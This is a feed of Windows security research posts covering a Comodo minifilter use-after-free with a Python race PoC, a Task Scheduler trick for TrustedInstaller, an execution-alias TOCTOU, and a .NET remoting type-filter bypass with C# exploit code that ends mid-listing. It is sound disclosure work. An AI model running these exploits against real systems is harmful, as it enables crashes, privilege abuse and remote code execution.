The callbacks for the minifilter's data queue, a cancel-safe IRP queue, are initialized at offset 0x140 of the structure as the disassembly below shows. In addition, the queue list head is initialized at offset 0x1C0, and the first QWORD of the same struct is set to 0xB5C0B5C0B5C0B5C.


(Figure 1)

Next, a stream handle context is set for the file object and a pointer to the previously discussed internal structure is stored at offset 0x28 of the context.
Keep in mind that a stream handle context is unique per file object (user-mode handle).

(Figure 2)

The only minifilter callback which queues IRPs to the data queue is present in the IRP_MJ_DIRECTORY_CONTROL preoperation callback for the minor function IRP_MN_NOTIFY_CHANGE_DIRECTORY.

Before the IRP_MJ_DIRECTORY_CONTROL checks the minor function, it first verifies whether a stream handle context is available and whether a data queue is already present within. It checks if the pointer at offset 0x28 is valid and whether the magic value 0xB5C0B5C0B5C0B5C is present.


(Figure 3) : Click to Zoom

Before the call to FltCbdqInsertIo, the stream handle context is retrieved and a non-paged pool allocation of size 0xE0 is made of which the pointer is stored in RDI as shown below.


(Figure 4)

Later on, this structure is stored inside the FilterContext array of the FLT_CALLBACK_DATA structure for this request and is passed as a context to the insert routine.

(Figure 5)

FltCbdqInsertIo will eventually call the InsertIoCallback (seen initialized on Figure 1). Examining this routine we see that it queues the callback data structure to the data queue and then invokes FltQueueDeferredIoWorkItem to insert a work item that will be dispatched in a system thread later on.

As you can see from the disassembly below, the work item's dispatch routine (DeferredWorkItemRoutine) receives the newly allocated non-paged memory (Figure 4) as a context.

(Figure 6) : Click To Zoom
Here is a quick recap of what we saw until now :
  • For every file/directory open, a data queue is initialized and stored at offset 0x140 of an internal structure.
  • A context is allocated in which a pointer to the previous structure is stored at offset 0x28. This context is set as a stream handle context.
  • IRP_MJ_DIRECTORY_CONTROL checks if the minor function is IRP_MN_NOTIFY_CHANGE_DIRECTORY.
  • If that's the case, a non-paged pool allocation of size 0xE0 is made and initialized.
  • The allocation is stored inside the FLT_CALLBACK_DATA and is passed to FltCbdqInsertIo as a context.
  • FltCbdqInsertIo ends up calling the insert callback (InsertIoCallback) with the non-paged pool allocation as a context.
  • The insert callback inserts the request into the queue, queues a deferred work item with the same allocation as a context. 
It is very simple for a sandboxed user-mode process to make the minifilter take this code path, it only needs to call the API FindFirstChangeNotificationA on an arbitrary directory.

Let's carry on.

So, the work item's context (the non-paged pool allocation made by IRP_MJ_DIRECTORY_CONTROL for the directory change notification request) must be freed somewhere, right? This is accomplished by IRP_MJ_CLEANUP's preoperation routine.

As you might already know, IRP_MJ_CLEANUP is sent when the last handle of a file object is closed, so the callback must perform the janitor's work at this stage.

In this instance, the stream handle context is retrieved similarly to what we saw earlier. Next, the queue is disabled so no new requests are queued, and then the queue cleanup is done by "DoCleanup".

(Figure 8)

As shown below this sub-routine dequeues the pended requests from the data queue, retrieves the saved context structure in FLT_CALLBACK_DATA, completes the operation, and then goes on to free the context.

(Figure 9)
We can trigger what we've seen until now from a contained process by :
  • Calling FindFirstChangeNotificationA on an arbitrary directory e.g. "C:\" : Sends IRP_MJ_DIRECTORY_CONTROL and causes the delayed work item to be queued.
  • Closing the handle : Sends IRP_MJ_CLEANUP.
What can go wrong here? The answer is the context being freed before the delayed work item is dispatched, so the work item eventually receives a freed context and uses it (use-after-free).

In other words, we have to make the minifilter receive an IRP_MJ_CLEANUP request before the delayed work item queued in IRP_MJ_DIRECTORY_CONTROL is dispatched for execution.

When trying to reproduce the vulnerability with a single thread, I noticed that the work item is always dispatched before IRP_MJ_CLEANUP is received. This makes sense in my opinion since the work item queue doesn't contain many items and dispatching a work item would take less time than all the work the subsequent call to CloseHandle does.

So the idea here was to create multiple threads that infinitely call :
CloseHandle(FindFirstChangeNotificationA(..)) to saturate the work item queue as much as possible and delay the dispatching of work items until the contexts are freed. A crash occurs once a work item accesses a freed context's pool allocation that was corrupted by some new allocation.

Below is the proof of concept to reproduce the vulnerability :
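A minimal Python sketch of that idea (not the author's original code; the directory, thread count and notify filter are arbitrary choices, and it must be run from inside the Comodo container):

import ctypes
import threading
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.FindFirstChangeNotificationA.restype = wintypes.HANDLE
kernel32.FindFirstChangeNotificationA.argtypes = [wintypes.LPCSTR, wintypes.BOOL, wintypes.DWORD]
kernel32.CloseHandle.argtypes = [wintypes.HANDLE]

INVALID_HANDLE_VALUE = wintypes.HANDLE(-1).value
FILE_NOTIFY_CHANGE_FILE_NAME = 0x00000001

def hammer():
    # Each iteration sends IRP_MJ_DIRECTORY_CONTROL (queuing the deferred work item)
    # followed immediately by IRP_MJ_CLEANUP (which frees the work item's context).
    while True:
        h = kernel32.FindFirstChangeNotificationA(b"C:\\", False, FILE_NOTIFY_CHANGE_FILE_NAME)
        if h and h != INVALID_HANDLE_VALUE:
            kernel32.CloseHandle(h)

threads = [threading.Thread(target=hammer, daemon=True) for _ in range(8)]
for t in threads:
    t.start()
for t in threads:
    t.join()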



And here is a small Windbg trace to see what happens in practice (inside parentheses is the address of the context) :
    1. [...]
       QueueWorkItem(fffffa8062dc6f20)
       DeferredWorkItem(fffffa8062dc6f20)
       ExFreePoolWithTag(fffffa8062dc6f20)
       [...]
    2. QueueWorkItem(fffffa80635d2ea0)
       ExFreePoolWithTag(fffffa80635d2ea0)
       QueueWorkItem(fffffa8062dd5c10)
       ExFreePoolWithTag(fffffa8062dd5c10)
       QueueWorkItem(fffffa8062dd6890)
       ExFreePoolWithTag(fffffa8062dd6890)
       QueueWorkItem(fffffa8062ddac80)
       ExFreePoolWithTag(fffffa8062ddac80)
       QueueWorkItem(fffffa80624cd5e0)
       [...]
    3. DeferredWorkItem(fffffa80635d2ea0)
In (1.) everything is normal, the work item is queued, dispatched and then the pool allocation it uses is freed.

In (2.) things start going wrong, the work item is queued but before it is dispatched the context is freed.

In (3.) the deferred work item is dispatched with freed and corrupted memory in its context causing an access violation and thus a BSOD.

We see in this case that the freed pool allocation was entirely repurposed and is now part of a file object :

(Figure 10) : Click to Zoom

Reproducing the bug, you will encounter an access violation at this part of the code:

(Figure 11)

And as we can see, it expects multiple pointers to be valid including a resource pointer which makes exploitation non-trivial.

That's all for this article, until next time :)




The Art of Becoming TrustedInstaller - Task Scheduler Edition

By: tiraniddo
2 September 2019 at 05:28
2 years ago I wrote a post about running a process in the TrustedInstaller group. It was pretty well received, and as others pointed out there are many ways of doing the same thing. However in my travels I came across a new way I've not seen documented before, though I'm sure someone will point out where I've missed documentation. As with the previous post, this does require admin privileges, it's not a privilege escalation. Also I tested the behavior I'm documenting on Windows 10 1903. Your mileage may vary on different versions of Windows.

It revolves around the Task Scheduler (obvious by the title I guess), specifically calling the IRegisteredTask::RunEx method exposed by the Task Scheduler COM API. The prototype of RunEx is as follows:

HRESULT RunEx(
  VARIANT      params,
  LONG         flags,
  LONG         sessionID,
  BSTR         user,
  IRunningTask **ppRunningTask
);

The thing we're going to use is the user parameter, which is documented as "The user for which the task runs." Cheers Microsoft! Through a bit of trial and error, and some reverse engineering it's clear the user parameter can take three types of string values:

  1. A normal user account. This can be the name or a SID. The user must be logged on at the time of starting the task as far as I can tell.
  2. The standard system accounts, i.e. SYSTEM, LocalService or NetworkService.
  3. A service account!
Number 3 is the one we're interested in here, it allows you to specify an installed service account, such as TrustedInstaller and the task will run as SYSTEM with the service SID included. Let's try it out.

The advantage of using the user parameter is the task can be registered to run as a normal user, and we'll change it at run time to be more sneaky. In theory you could directly register the task to run as TrustedInstaller, but then it'd be more obvious if anyone went looking. First we need to create a scheduled task, run the following script in PowerShell to create a simple task which will run notepad.

$a = New-ScheduledTaskAction -Execute notepad.exe
Register-ScheduledTask -TaskName 'TestTask' -Action $a

Now we need to call RunEx. While PowerShell has a Start-ScheduledTask cmdlet, neither it nor the schtasks.exe /Run command allows you to specify the user parameter (as an aside, the /U parameter for schtasks does not do what you might think). Instead, as the COM API is scriptable, we can just run some PowerShell again and use the COM API directly.

$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()

$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
$task = $folder.GetTask('TestTask')
$task.RunEx($null, 0, 0, $user)

After executing this script you should find a copy of notepad running as SYSTEM with the TrustedInstaller group in the access token.


Enjoy responsibly. 

Overview of Windows Execution Aliases

By: tiraniddo
11 September 2019 at 13:10
I thought I'd blogged about this topic, however it turns out I hadn't. This blog is in response to a recent Twitter thread from Bruce Dawson on a "fake" copy of Python which Microsoft seems to have force installed on some people's Windows 10 1903 installations. I'll go through the main observation in the thread, that the Python executable is 0 bytes in size, explain how this works under the hood to start a process, and finish with a dumb TOCTOU bug which still exists in part of the implementation which _might_ be useful as part of an EOP chain.

Execution Aliases for UWP applications were introduced in Windows 10 Fall Creators Update (1709/RS3). For application developers this feature is exposed by adding an AppExecutionAlias XML element to the application's manifest. The manifest information is used by the AppX installer to drop the alias into the %LOCALAPPDATA%\Microsoft\WindowsApps folder, which is also conveniently (or not depending on your POV) added to the user PATH environment variable. This allows you to start a UWP application as if it was a command line application, including passing command line arguments. One example is shown below, which is taken from the WinDbgX manifest.

<uap3:Extension Category="windows.appExecutionAlias" Executable="DbgX.Shell.exe" EntryPoint="Windows.FullTrustApplication">
  <uap3:AppExecutionAlias>
    <desktop:ExecutionAlias Alias="WinDbgX.exe" />
  </uap3:AppExecutionAlias>
</uap3:Extension>

This specifies an execution alias to run DbgX.Shell.exe from the file WinDbgX.exe. If we go to the WindowsApps folder we can see that there is a file with that name, and as mentioned in the Twitter thread it is a 0 byte file. Also if you try and open the file (say using the type command) it fails.

Directory listing of WindowsApps folder showing 0 byte WinDbgX.exe file and showing that trying to open file fails.

How can an empty file result in a process being created? Executing the WinDbgX.exe file inside a shell while running Process Monitor shows some interesting results which I've highlighted below:

Process Monitor output showing opens to WinDbgX with a "REPARSE" result and also a call to get the reparse point data.

The first thing to highlight is the CreateFile calls which return a "REPARSE" result. This is a good indication that the file contains a reparse point. You might assume therefore that this file is a symbolic link to the real target, however a symbolic link would still be possible to open which we can't do. Another explanation is the reparse point is a custom type, not understood by the kernel. This ties in with the subsequent call to FileSystemControl with the FSCTL_GET_REPARSE_POINT code which would indicate some user-mode code is requesting information about the stored reparse point. Looking at the stack trace we can see who's requesting the reparse point data:

Stack trace of FSCTL_GET_REPARSE_POINT showing calls from CreateProcessInternal

The stack trace shows the reparse point data is being queried from inside CreateProcess, through the exported function LoadAppExecutionAliasInfoEx. We can dig into CreateProcessInternal to see how it all works:

HANDLE token = ...;
NTSTATUS status = NtCreateUserProcess(ApplicationName, ..., token);
if (status == STATUS_IO_REPARSE_TAG_NOT_HANDLED) {
  LPWSTR alias_path = ResolveAlias(ApplicationName);
  PEXEC_ALIAS_DATA alias;
  LoadAppExecutionAliasInfoEx(alias_path, &alias);
  status = NtCreateUserProcess(alias.ApplicationName, ..., alias.Token);
}

CreateProcessInternal will first try and execute the path directly, however as the file has an unknown reparse point the kernel fails to open the file with STATUS_IO_REPARSE_TAG_NOT_HANDLED. This status code provides an indicator to take an alternative route, the alias information is loaded from the file's reparse tag using LoadAppExecutionAliasInfoEx and an updated application path and access token are used to start the new process.

What is the format of the reparse point data? We can easily dump the bytes and have a look in a hex editor:

Hex dump of reparse data with highlighted tag.

The first 4 bytes is the reparse tag, in this case it's 0x8000001B which is documented in the Windows SDK as IO_REPARSE_TAG_APPEXECLINK. Unfortunately there doesn't seem to be a corresponding structure, but with a bit of reverse engineering we can work out the format is as follows:

Version: <4 byte integer>
Package ID: <NUL Terminated Unicode String>
Entry Point: <NUL Terminated Unicode String>
Executable: <NUL Terminated Unicode String>
Application Type: <NUL Terminated Unicode String>

The reason we have no structure is probably because it's a serialized format. The Version field seems to be currently set to 3, I'm not sure if there exist other versions used in earlier Windows 10 builds but I've not seen any. The Package ID and Entry Point are information used to identify the package; an execution alias can't be used like a shortcut for a normal application, it can only resolve to an installed packaged application on the system. The Executable is the real file that'll be executed instead of the original 0 byte alias file. Finally, Application Type is the type of application being created; while a string, it's actually an integer formatted as a string. The integer seems to be zero for desktop bridge applications and non-zero for normal sandboxed UWP applications. I implemented a parser for the reparse data inside NtApiDotNet, you can view it in NtObjectManager using the Get-ExecutionAlias cmdlet.

Result of executing Get-ExecutionAlias WinDbgX.exe
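If you'd rather pull the fields out by hand, here's a hedged Python sketch of parsing just the serialized payload laid out above (it assumes 'data' holds the reparse buffer contents with the standard reparse point header already stripped, e.g. as returned by FSCTL_GET_REPARSE_POINT):

import struct

def parse_appexeclink(data: bytes) -> dict:
    # 4-byte version followed by NUL-terminated UTF-16LE strings, per the layout above.
    version, = struct.unpack_from("<I", data, 0)
    strings = data[4:].decode("utf-16-le").split("\0")
    fields = ["PackageId", "EntryPoint", "Executable", "ApplicationType"]
    return {"Version": version, **dict(zip(fields, strings))}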

We now know how the Executable file is specified for the new process creation but what about the access token I alluded to? I actually mentioned this at Zer0Con 2018 when I talked about Desktop Bridge. The AppInfo service (of UAC fame) has an additional RPC service which creates an access token from an execution alias file. This is all handled inside LoadAppExecutionAliasInfoEx but operates similar to the following diagram:

Operation of RAiGetPackageActivationToken.

The RAiGetPackageActivationToken RPC function takes a path to the execution alias and a template token (which is typically the current process token, or the explicit token if CreateProcessAsUser was called). The AppInfo service reads the reparse information from the execution alias and constructs an activation token based on that information. This token is then returned to the caller where it's used to construct the new process. It's worth noting that if the Application Type is non-zero this process doesn't actually create the AppContainer token and spawn the UWP application. This is because activation of a UWP application is considerably more complex to stuff into CreateProcess, so instead the execution alias' executable file is specified as the SystemUWPLauncher.exe file in system32 which completes activation based on the package information from the token.

What information does the activation token contain? It's basically the Security Attribute information for the package, this can't normally be modified from a user application, it requires TCB privilege. Therefore Microsoft do the token setup in a system service. An example token for the WinDbgX alias is shown below:

Token security attributes showing WinDbg package identity.

The rest of the activation process is not really that important. If you want to know more about the process checkout my talks on Desktop Bridge and the Windows Runtime.

I promised to finish up with a TOCTOU attack. In theory we should be able to create an execution alias for any installed application package, it might not start a working process but we can use RAiGetPackageActivationToken to get a new token with explicit package security attributes which could be useful for further exploitation. For example we could try creating one for the Calculator package with the following PowerShell script (note this uses version information for calculator on 1903 x64).

Set-ExecutionAlias -Path C:\winapps\calc.exe `
     -PackageName "Microsoft.WindowsCalculator_8wekyb3d8bbwe" `
     -EntryPoint "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App" `
     -Target "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.53.0_x64__8wekyb3d8bbwe\Calculator.exe" `
     -AppType UWP1

If we call RAiGetPackageActivationToken this works and creates a new token, however it creates a reduced privilege UWP token (it's not an AppContainer token but, for example, all privileges are stripped and the security attributes assume it'll be running in a sandbox). What if we wanted to create a Desktop Bridge token which isn't restricted in this way? We could change the AppType to Desktop, however if you do this you'll find RAiGetPackageActivationToken fails with an access denied error. Digging a bit deeper we find it fails in daxexec!PrepareDesktopAppXActivation, specifically when it's checking whether the package contains any Centennial (now Desktop Bridge) applications.

HRESULT PrepareDesktopAppXActivation(PACTIVATION_INFO activation_info) {
    if ((activation_info->Flags & 1) == 0) {
        CreatePackageInformation(activation_info, &package_info);
        if (FAILED(package_info->ContainsCentennialApplications())) {
            return E_ACCESS_DENIED; // <-- Fails here.
        }
    }
    // ...
}

This of course makes perfect sense, there's no point creating a desktop activation token for a package which doesn't have any desktop applications. However, notice the if statement: if bit 1 of the flags is not set the check is performed, but if it is set these checks are skipped entirely. Where does that bit get set? We need to go back to the caller of PrepareDesktopAppXActivation, which is, unsurprisingly, RAiGetPackageActivationToken.

ACTIVATION_INFO activation_info = {};
bool trust_label_present = false;
HRESULT hr = IsTrustLabelPresentOnReparsePoint(path, &trust_label_present);
if (SUCCEEDED(hr) && trust_label_present) {
    activation_info.Flags |= 1;
}
PrepareDesktopAppXActivation(&activation_info);

This code shows that the flag is set based on the result of IsTrustLabelPresentOnReparsePoint. While we could infer what that function is doing let's reverse that as well:

HRESULT IsTrustLabelPresentOnReparsePoint(LPWSTR path, bool *trust_label_present) {
    HANDLE file = CreateFile(path, READ_CONTROL, ...);
    if (file == INVALID_HANDLE_VALUE)
        return E_FAIL;
    PSID trust_sid;
    GetWindowsPplTrustLabelSid(&trust_sid);
    PSID sacl_trust_sid;
    GetSecurityInfo(file, SE_FILE_OBJECT,
                    PROCESS_TRUST_LABEL_SECURITY_INFORMATION,
                    &sacl_trust_sid);
    *trust_label_present = EqualSid(trust_sid, sacl_trust_sid);
    return S_OK;
}

Basically what this code is doing is querying the file object for its Process Trust Label. The label can only be set by a Protected Process, which normally we're not. There are ways of injecting into such processes but without that we can't set the trust label. Without the trust label the service will do the additional checks which stop us creating an arbitrary desktop activation token for the Calculator package.

However notice how the check re-opens the file. This occurs after the reparse point, which contains all the package details, has already been read. It should be clear that there's a TOCTOU here: if you can get the service to first read an execution alias with the package information, then switch that file for another which has a valid trust label, we can disable the additional checks. This is the sort of attack my BaitAndSwitch tool was made for. If you build a copy and run the following command you can then use RAiGetPackageActivationToken with the path c:\x\x.exe and it'll bypass the checks:

BaitAndSwitch c:\x\x.exe c:\path\to\no_label_alias.exe c:\path\to\valid_label_alias.exe x

Note that the final 'x' is not a typo, this ensures the oplock is opened in exclusive mode so that it triggers when the file is initially opened to read the package information. Is there much you can really do with this? Probably not, but I thought it was interesting nonetheless. It'd be more interesting if this had disabled other, more important checks, but it seems to only allow you to create a desktop activation token.

That about wraps it up for now. Embedding this functionality inside CreateProcess was clever, certainly compared to the crappy support for UAC which requires calling ShellExecute. However it also adds new and complex functionality to CreateProcess which didn't exist before. I'm sure there's probably some exploitable security bug in the code here, but I'm too lazy to find it :-)

Random PDC Driver

8 October 2019 at 13:37
Found this funny driver: The pdc.sys windows driver has a DriverUnload routine but it calls KeBugCheckEx causing a bluescreen. Just run "sc stop pdc" and see for yourself ;) I wonder why they registered DriverUnload if the driver does not support unload.. 🤔 pic.twitter.com/TNpKIZGvZX — Ori Damari (@0xrepnz) October 8, 2019

About Me

19 October 2019 at 16:37
Hey! My name is Ori Damari, and I love low level code. I hope you find this blog interesting and learn new stuff. I do low level research for a living. My main interests are: malware, operating systems, Windows internals, reverse engineering, kernel development and software development. repnz is my nickname (I pronounce it "rep notzero") - I like assembly. You can contact me easily using Twitter messages: @0xrepnz

Bypassing Low Type Filter in .NET Remoting

By: tiraniddo
25 October 2019 at 21:02
I recently added a new feature to my .NET remoting exploitation tool which in many cases allows you to exploit an arbitrary service through serialization. This feature has always existed in the tool if you passed the useser option, however it only worked if the service had enabled Full Type Filter mode. The default for remoting services is Low Type Filter, which my tool couldn't easily exploit. I'm going to explain how I bypassed Low Type Filter mode in the latest tool.

It's worth noting that this technique is currently unpatched, however no one should be using .NET remoting in a modern context (*cough* Visual Studio *cough*).

I'd recommend starting by reading my previous blog post on this subject as it describes where the Type Filtering comes into play. You can also read this MSDN page which describes what can and cannot be deserialized during a .NET remoting call with Low versus Full Type Filtering enabled.

In simple terms enabling Low (which is the default) over Full results in the following restrictions:
  • Object types derived from MarshalByRefObject, DelegateSerializationHolder, ObjRef, IEnvoyInfo and ISponsor can not be deserialized. 
  • All objects which are deserialized must not Demand any CAS permission other than SerializationFormatter permission.
The useser technique abuses the fact that certain classes such as DirectoryInfo and FileInfo are both derived from MarshalByRefObject (MBR) and are also serializable. By deserializing an instance of one of these special classes inside a carefully crafted Hashtable with an MBR instance of IEqualityComparer, you can get the server to pass the instance back to you. As this object is passed back over the remoting channel the DirectoryInfo or FileInfo object is marshalled by reference and stays stuck inside the server. We can now call methods on the returned object to read and write arbitrary files, which we can use to get full code execution in the server. I've summarized the main interactions in the following diagram:
1, Create DirectoryInfo, 2, Serialize DirectoryInfo, 3, Handle Remoting, 4, Deserialize DirectoryInfo, 5, Marshal By Reference, 6, Capture DirectoryInfo, 7, Create AdminFile.txt, 8, AdminFile.txt created.
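
To make the client's side of this concrete, here's a minimal sketch of the capture object (illustrative names, not the code from ExploitRemotingService):

// Sketch of the useser capture trick. When the Hashtable is deserialized on the
// server the rehash calls back into this MBR comparer, handing us the server-side
// DirectoryInfo marshalled by reference.
using System;
using System.Collections;
using System.IO;

public class CaptureComparer : MarshalByRefObject, IEqualityComparer
{
    public object Captured { get; private set; }

    bool IEqualityComparer.Equals(object x, object y) => ReferenceEquals(x, y);

    int IEqualityComparer.GetHashCode(object obj)
    {
        // 'obj' is the DirectoryInfo living in the server process.
        Captured = obj;
        return 0;
    }
}

public static class UseSerPayload
{
    // The graph to serialize. Note it needs to be serialized by value (e.g. with
    // a standalone BinaryFormatter) so the DirectoryInfo travels as data, while
    // the comparer, being MBR, is serialized as a reference back to the client.
    public static Hashtable Build(string serverSidePath, CaptureComparer comparer)
    {
        var table = new Hashtable(comparer);
        table.Add(new DirectoryInfo(serverSidePath), "placeholder");
        return table;
    }
}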

Low Type Filter acts to modify the behavior of the BinaryServerFormatterSink block, which encapsulates blocks 3, 4 and 5. The change in behavior blocks the useser technique in three ways.

Firstly, in order to get the instance of the special object passed back to the client we need to pass an MBR IEqualityComparer. This will be blocked during handling of the remoting message (3).

Secondly, when deserializing an instance of FileInfo or DirectoryInfo (4) a Demand is made for FileIOPermission on the path being accessed. As the permission Demand is made during deserialization it hits the restriction that only SerializationFormatter permissions are allowed.

Thirdly, even if the object is deserialized successfully we'll hit a final problem: calling the IEqualityComparer (5 and 6) over a remoting channel to pass back the reference requires setting up a new TCP or named pipe connection. Setting up the connection will also hit the limited permissions and again throw an exception, causing the call to fail.
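
To see why those last two issues are fatal, here's a tiny standalone repro of the CAS behavior (my own example, not code from the remoting stack): under a PermitOnly grant of just SerializationFormatter, any other Demand throws a SecurityException.

// Repro of the PermitOnly behavior described above, assuming .NET Framework 4.x.
using System;
using System.Security;
using System.Security.Permissions;

class PermitOnlyDemo
{
    static void DemandFileAccess()
    {
        // Roughly the kind of Demand FileInfo/DirectoryInfo deserialization makes.
        new FileIOPermission(FileIOPermissionAccess.Read, @"C:\").Demand();
    }

    static void Main()
    {
        var permitted = new PermissionSet(PermissionState.None);
        permitted.AddPermission(new SecurityPermission(
            SecurityPermissionFlag.SerializationFormatter));
        permitted.PermitOnly();
        try
        {
            DemandFileAccess();
            Console.WriteLine("Demand succeeded");
        }
        catch (SecurityException)
        {
            Console.WriteLine("Demand failed under PermitOnly");
        }
        finally
        {
            CodeAccessPermission.RevertPermitOnly();
        }
    }
}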

How can we work around the three issues? Let's first bypass the type checking which prevents MBR objects being deserialized. If you dig into the code you'll find the type checks are performed in the ObjectReader::CheckSecurity method, which is as follows:

internal void CheckSecurity(ParseRecord pr) {
    Type t = pr.PRdtType;
    if ((object)t != null) {
        if (IsRemoting) {
            if (typeof(MarshalByRefObject).IsAssignableFrom(t))
                throw new ArgumentException();
            FormatterServices.CheckTypeSecurity(t, formatterEnums.FEsecurityLevel);
        }
    }
}

The important thing to note is that the checks are only made if the IsRemoting property is true. What determines the value of the property? Again we can just look in the reference source:

private bool IsRemoting {
    get {
        return (bMethodCall || bMethodReturn);
    }
}

What sets bMethodCall or bMethodReturn? They're set by the BinaryFormatter when it encounters the special MethodCall or MethodReturn record types. It turns out that, maybe for performance or security (it's unclear), the formatter special cases these object types when used in .NET remoting, only storing the properties of these objects when serializing and reconstructing the method objects when deserializing.

However if you read my previous blog post you'll notice something: I was unmarshalling an MBR instance of an IMessage, and that didn't hit the checks. This is because as long as the top level record is not a MethodCall or MethodReturn record type we can deserialize anything we like, so that check was easy to bypass. In theory we can just pass a serialized Hashtable as the top level object; it'll cause the remoting server code to fault when trying to call methods on the message object, but by then it'd be too late. In fact this is exactly what the useser option does anyway, however it's the second security feature which really causes us problems when trying to get it to work on Low Type Filter.

When handling an incoming request the sink enables a PermitOnly CAS grant over the deserialization process, which only allows SerializationFormatter permissions to be asserted. You can see it in action in the reference source here, which I've copied below.

PermissionSet currentPermissionSet = null;
if (this.TypeFilterLevel != TypeFilterLevel.Full) {
    currentPermissionSet = new PermissionSet(PermissionState.None);
    currentPermissionSet.SetPermission(
        new SecurityPermission(
            SecurityPermissionFlag.SerializationFormatter));
}

try {
    if (currentPermissionSet != null)
        currentPermissionSet.PermitOnly();

    // Deserialize Request - Stream to IMessage
    requestMsg = CoreChannel.DeserializeBinaryRequestMessage(
        objectUri, requestStream, _strictBinding, this.TypeFilterLevel);
}
finally {
    if (currentPermissionSet != null)
        CodeAccessPermission.RevertPermitOnly();
}


As we're passing the Hashtable, containing the serialized object we want to capture as well as the MBR IEqualityComparer, as the top level object, all of our machinations will run under this PermitOnly grant which, as I've already noted, will fail. If we could defer the deserialization, or at least any privileged operation, until after the CAS grant is reverted we'd be able to exploit this trick, but how can we do that?

One way to defer code execution is to exploit object finalization. Basically when an object's resources are about to be reclaimed by the GC it'll call the object's finalizer. This call is made on a GC thread completely outside the deserialization process and so wouldn't be affected by the CAS PermitOnly grant. In fact abusing finalizers was something I pointed out in my original research on .NET serialization, a good example is the infamous TempFileCollection class.

I thought about trying to find a useful gadget to exploit this, however there were two problems. First, the difficulty of finding a suitable object which is both serializable and has a useful finalizer defined; and second, the call to the finalizer is non-deterministic as it happens whenever the GC decides to run. In theory the GC might never run at all.

I decided to focus on a different approach based on a non-obvious observation: the PermitOnly security behavior of Low Type Filter only applies when calling a method on a server object, not when deserializing the return value of a call the server itself makes. Therefore if I could find somewhere in the server which calls back to an MBR object I control then I could force the server to deserialize an arbitrary object. This object can be used to mount the attack, as the deserialization would not occur under the PermitOnly CAS grant, and I can use the same Hashtable trick to capture a DirectoryInfo or FileInfo object.

In theory you could find an exposed method on the server object to use for this callback, however I wanted my code to be generic and not require knowledge of the server object outside of knowing the URI. Therefore it'd have to be a method we can call on the MBR or base Object class. An initial look shows only one candidate, the Object::Equals method which takes a single parameter. Unfortunately most of the time a server object won't override this method and the default just performs reference equality, which doesn't call any methods on the passed object.

The only other candidates are the InitializeLifetimeService or GetLifetimeService methods, which return an MBR object implementing the ILease interface. I'm not going to go into what this is used for (you can read up on it on MSDN) but what I noticed was that the ILease interface has a Register method which takes an object implementing the ISponsor interface. If you register an MBR object from the client with the server's lifetime service, then when the server wants to check if the object should be destroyed it'll call the ISponsor::Renewal method, which gives us our callback. While the method doesn't return an object, we can just throw an exception with the Hashtable inside and exploit the service. Victory?
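
As a rough sketch (illustrative only, the real tool's payload packaging may differ), the client-side sponsor could look something like this, with the Hashtable stashed in the exception's Data dictionary so it gets serialized back to the server and deserialized there outside the PermitOnly grant:

// Sketch of a client-side ISponsor whose Renewal callback delivers the payload.
using System;
using System.Collections;
using System.Runtime.Remoting.Lifetime;

public class PayloadSponsor : MarshalByRefObject, ISponsor
{
    private readonly Hashtable _payload;

    public PayloadSponsor(Hashtable payload)
    {
        _payload = payload;
    }

    public TimeSpan Renewal(ILease lease)
    {
        // Throwing sends the exception (and the Hashtable stored in Data) back
        // to the server, where it gets deserialized outside the PermitOnly grant.
        var ex = new Exception("renew");
        ex.Data["payload"] = _payload;
        throw ex;
    }
}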

Not quite, it turns out we've now got new problems. The first is that the Renewal call only happens when the lifetime counter expires; the default timeout is around 10 minutes from the last call to the server. This means our exploit will only run at some long, potentially indeterminate point in time. Not the end of the world, but as frustrating as waiting for a GC run to get a finalizer executed. The second problem seems more insurmountable: in order to set the ISponsor object we need to make an actual call to the server, however Low Type Filter would stop us from passing an MBR ISponsor object, as the top level object would be a MethodCall record type which would throw an exception when the MBR argument was encountered during deserialization.

What can we do? It turns out there's an easy way around this: the framework provides us with a fully serializable MethodCall class. Instead of using the MethodCall record type we can package up a serializable MethodCall object as the top level object with all the data needed to make the call to Register. As the top level object uses a normal serialized object record type and not a MethodCall record type it'll never trigger the type checking, and we can call Register with our MBR ISponsor object.

You might wonder if there's another problem here: won't deserializing the MBR cause the channel to be created and hit the PermitOnly CAS grant? Fortunately channel setup is deferred until a call is made on the object, therefore as long as no call is made to the MBR object during the deserialization process we'll be outside the CAS grant and able to set up the channel when the Renewal method is called.

We now have a way of exploiting the remoting service without knowledge of any specific methods on the server object; the only problem is we might need to wait 10 minutes to do it. Can we improve on the time? Digging further into the default remoting implementation I noticed that if an argument being passed to a method isn't directly of the required type, the method StackBuilderSink::SyncProcessMessage will call Message::CoerceArgs to try and coerce the argument to the correct type. The fallback is to call Convert::ChangeType passing the needed type and the object passed from the client. To convert to the correct type the code will see if the passed object implements the IConvertible interface and call the ToType method on it. Therefore, instead of passing an implementation of ISponsor to Register we just pass one which implements IConvertible; the remoting code will try and coerce it using ChangeType which gives us our needed callback immediately without waiting 10 minutes. I've summarized the attack in the following diagram:

1, Call ILease::Register, 2, Handle Message, 3 Coerce Arguments, 4, Create DirectoryInfo, 5, Deserialize DirectoryInfo, 6, Marshal DirectoryInfo, 7, Capture DirectoryInfo, 8 Create AdminFile.
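
The client object for this variation has the same shape as the sponsor sketch above, just delivering the payload from IConvertible::ToType when the server coerces the argument. Again this is illustrative rather than the tool's actual implementation:

// Sketch of the IConvertible variant: the server's argument coercion remotes back
// into ToType, which throws the payload-carrying exception immediately.
using System;
using System.Collections;

public class CoercionSponsor : MarshalByRefObject, IConvertible
{
    private readonly Hashtable _payload;

    public CoercionSponsor(Hashtable payload)
    {
        _payload = payload;
    }

    public object ToType(Type conversionType, IFormatProvider provider)
    {
        var ex = new Exception("coerce");
        ex.Data["payload"] = _payload;
        throw ex;
    }

    public TypeCode GetTypeCode() => TypeCode.Object;

    // The remaining IConvertible members are irrelevant to the attack.
    public bool ToBoolean(IFormatProvider p) => throw new InvalidCastException();
    public byte ToByte(IFormatProvider p) => throw new InvalidCastException();
    public char ToChar(IFormatProvider p) => throw new InvalidCastException();
    public DateTime ToDateTime(IFormatProvider p) => throw new InvalidCastException();
    public decimal ToDecimal(IFormatProvider p) => throw new InvalidCastException();
    public double ToDouble(IFormatProvider p) => throw new InvalidCastException();
    public short ToInt16(IFormatProvider p) => throw new InvalidCastException();
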